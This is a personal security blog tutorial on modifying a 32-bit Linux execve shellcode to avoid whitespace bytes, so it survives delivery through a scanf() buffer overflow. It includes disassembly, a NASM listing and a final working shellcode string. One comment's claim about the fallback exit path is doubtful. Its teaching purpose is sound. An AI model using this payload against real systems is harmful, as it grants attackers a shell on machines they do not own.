Josh Stone, Blog

Josh’s projects and security nerdery

No Whitespace Shellcode

Here’s another installment in my series of posts about mystical things that turn out not to be so mystical. The information security industry is full of these, and today I’m posting about shellcode. Shellcode is definitely arcane, but it’s possible to enter this world – at least enough to get things done.

I was working on exploiting a vulnerability that relied on delivering a payload to overflow a buffer through a call to scanf(). I noticed that sometimes the entire shellcode would make it, and other times it would get truncated. After wrestling with it for a while, I found this gem in the scanf() man page regarding the %s conversion specifier:

   Matches a  sequence  of  non-white-space  characters;  the  next
   pointer must be a pointer to character array that is long enough
   to hold the input sequence and the  terminating  null  character
   ('\0'), which is added automatically.  The input string stops at
   white space or at the  maximum  field  width,  whichever  occurs
   first.

Note the key phrase “non-white-space characters.” Yes, scanf() will stop reading when it gets to anything it considers whitespace. Its definition is a little more expansive than you might expect: it is whatever isspace() accepts, which covers not just the normal space, tab (0x09), and newline (0x0a), but also carriage return (0x0d), form feed (0x0c), and 0x0b, which is a vertical tab. To exploit the vulnerability I was working on, I needed shellcode without any of those bytes in it.
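If you want to see the full list for yourself, here is a minimal sketch that asks isspace() about every possible byte value. The helper names list_whitespace_bytes() and is_scanf_whitespace() are my own inventions for illustration, and the result assumes the default "C" locale (that is, a program that never calls setlocale()).

```c
#include <ctype.h>
#include <stddef.h>

/* Hypothetical helper: nonzero if scanf("%s") would stop at this byte,
 * assuming the default "C" locale. */
int is_scanf_whitespace(unsigned char b)
{
    return isspace(b) != 0;
}

/* Hypothetical helper: stores every whitespace byte value in `out`
 * (which must have room for 256 entries) and returns how many it found. */
size_t list_whitespace_bytes(unsigned char *out)
{
    size_t n = 0;
    for (int c = 0; c < 256; c++) {
        if (is_scanf_whitespace((unsigned char)c))
            out[n++] = (unsigned char)c;
    }
    return n;
}
```

In the "C" locale this should report six values: 0x09 through 0x0d, plus 0x20. Those are the bytes to keep out of a payload that travels through %s.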

I found a lot of nice shellcode examples on Shell Storm, but very few that didn’t have at least a 0x0c or 0x0b in them. So, not to be dissuaded from winning, I decided to try my hand at modifying one. Here’s the sample from Shell Storm, originally written by Jean Pascal Pereira:

08048060 <_start>:
 8048060: 31 c0                 xor    %eax,%eax
 8048062: 50                    push   %eax
 8048063: 68 2f 2f 73 68        push   $0x68732f2f
 8048068: 68 2f 62 69 6e        push   $0x6e69622f
 804806d: 89 e3                 mov    %esp,%ebx
 804806f: 89 c1                 mov    %eax,%ecx
 8048071: 89 c2                 mov    %eax,%edx
 8048073: b0 0b                 mov    $0xb,%al
 8048075: cd 80                 int    $0x80
 8048077: 31 c0                 xor    %eax,%eax
 8048079: 40                    inc    %eax
 804807a: cd 80                 int    $0x80

Note the 0x0b byte in the hexadecimal machine code (it is the second byte of the instruction at 8048073). This is the offending whitespace (it’s a vertical tab; why do those even EXIST?). First, we must understand where it comes from. It is the immediate operand in the machine code for this instruction (sorry for switching syntaxes on you, but I prefer NASM):

mov al, 0xb    ; moves the value 0x0b (decimal 11) into register al
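Spotting a bad byte by eye gets old fast, so here is a rough sketch of a scanner that does it mechanically. The array is my transcription of the 28 bytes in the disassembly above, and first_whitespace_offset() is a hypothetical helper name, not something from a library.

```c
#include <ctype.h>
#include <stddef.h>

/* The original payload, transcribed byte-for-byte from the disassembly. */
static const unsigned char original_shellcode[] = {
    0x31, 0xc0, 0x50, 0x68, 0x2f, 0x2f, 0x73, 0x68,
    0x68, 0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x89,
    0xc1, 0x89, 0xc2, 0xb0, 0x0b, 0xcd, 0x80, 0x31,
    0xc0, 0x40, 0xcd, 0x80
};

/* Hypothetical helper: returns the offset of the first byte that
 * isspace() treats as whitespace, or -1 if there is none. */
long first_whitespace_offset(const unsigned char *code, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (isspace(code[i]))
            return (long)i;
    }
    return -1;
}
```

Calling first_whitespace_offset(original_shellcode, sizeof original_shellcode) should point at offset 20, which is the 0x0b operand of the mov instruction.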

The mov al, 0xb instruction is necessary because we want to call the Linux sys_execve() syscall. On 32-bit x86 it happens to be number 11 (0x0b), and we’re not going to execute our shell without loading that number into eax. So we have to find another way to accomplish the same thing (and taking extra instructions is fine, since it’s a small shellcode). Here’s one idea:

mov al, 0xb0    ; moves the value 0xb0 into al, preparing for transformation
shr al, 4       ; shifts the 'b' into the least significant nibble (now equals 0x0b)

The machine code changes as shown below:

b0 0b   ->   b0 b0 c0 e8 04
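To convince yourself the arithmetic holds, here is a tiny C model of the two-instruction sequence. It is only a sketch: mov_then_shr() is a made-up name, and it assumes a shift count below 8, which is all we need here.

```c
#include <stdint.h>

/* Hypothetical model of `mov al, imm8` followed by `shr al, count`
 * on an 8-bit register. Assumes count < 8. */
uint8_t mov_then_shr(uint8_t imm8, unsigned count)
{
    uint8_t al = imm8;            /* mov al, imm8  */
    al = (uint8_t)(al >> count);  /* shr al, count */
    return al;
}
```

mov_then_shr(0xb0, 4) yields 0x0b, the syscall number we wanted, and none of the five replacement bytes (b0 b0 c0 e8 04) is whitespace.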

I had to make a couple of other modifications as well. The push instructions can clobber the shellcode itself, so you either have to add some padding at the end of the shellcode above, or move esp out of the way before pushing anything (I did the latter; see below). Now, I throw that into my assembler with the following source:

section .text

global _start

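_start:
    xor  eax, eax
    mov  al, 0x30     ; I added this so that there is room on the stack
    add  esp, eax     ; bump esp by 48 bytes so the pushes don't clobber the shellcode
    xor  al, al       ; eax is zero again
    push eax          ; NUL terminator for the string; this takes 4 bytes
    push 0x68732f2f   ; "//sh"; this takes another 4
    push 0x6e69622f   ; "/bin"; a total of 12 bytes of stack needed
    mov  ebx, esp     ; ebx points to "/bin//sh"
    mov  ecx, eax     ; ecx (argv) = NULL; unlike the original, edx is not set here
    mov  al, 0xb0
    shr  al, 4        ; al = 0x0b (sys_execve) with no whitespace byte
    int  0x80
    shr  al, 3        ; 0x0b >> 3 would be 1 (sys_exit); only reached if execve fails
    int  0x80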

And a quick compile:

[Image: Compile with NASM]

The shellcode works, and with just these small modifications, it will work well in my real-world case where I need to deliver it through scanf(). Here’s the hex string for reference:

char *buf = "\x31\xc0\xb0\x30"
            "\x01\xc4\x30\xc0"
            "\x50\x68\x2f\x2f"
            "\x73\x68\x68\x2f"
            "\x62\x69\x6e\x89"
            "\xe3\x89\xc1\xb0"
            "\xb0\xc0\xe8\x04"
            "\xcd\x80\xc0\xe8"
            "\x03\xcd\x80";
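As a final sanity check, here is a hedged sketch that pushes the payload through an actual %s conversion and counts how many bytes come out the other side. It uses sscanf() as a stand-in for the vulnerable scanf() call, which is my assumption rather than the real target, and bytes_copied_by_percent_s() is a hypothetical helper name.

```c
#include <stdio.h>
#include <string.h>

/* The 35-byte payload from above, stored as an array so sizeof works. */
static const char buf[] =
    "\x31\xc0\xb0\x30"
    "\x01\xc4\x30\xc0"
    "\x50\x68\x2f\x2f"
    "\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89"
    "\xe3\x89\xc1\xb0"
    "\xb0\xc0\xe8\x04"
    "\xcd\x80\xc0\xe8"
    "\x03\xcd\x80";

/* Hypothetical helper: returns how many bytes a "%s" conversion copies
 * from `payload`. The 127-byte cap is an arbitrary limit for this sketch. */
size_t bytes_copied_by_percent_s(const char *payload)
{
    char dest[128];
    if (sscanf(payload, "%127s", dest) != 1)
        return 0;
    return strlen(dest);
}
```

If bytes_copied_by_percent_s(buf) comes back equal to sizeof buf - 1, the whole payload made it through. Feeding it the original Shell Storm bytes instead should stop short at the 0x0b.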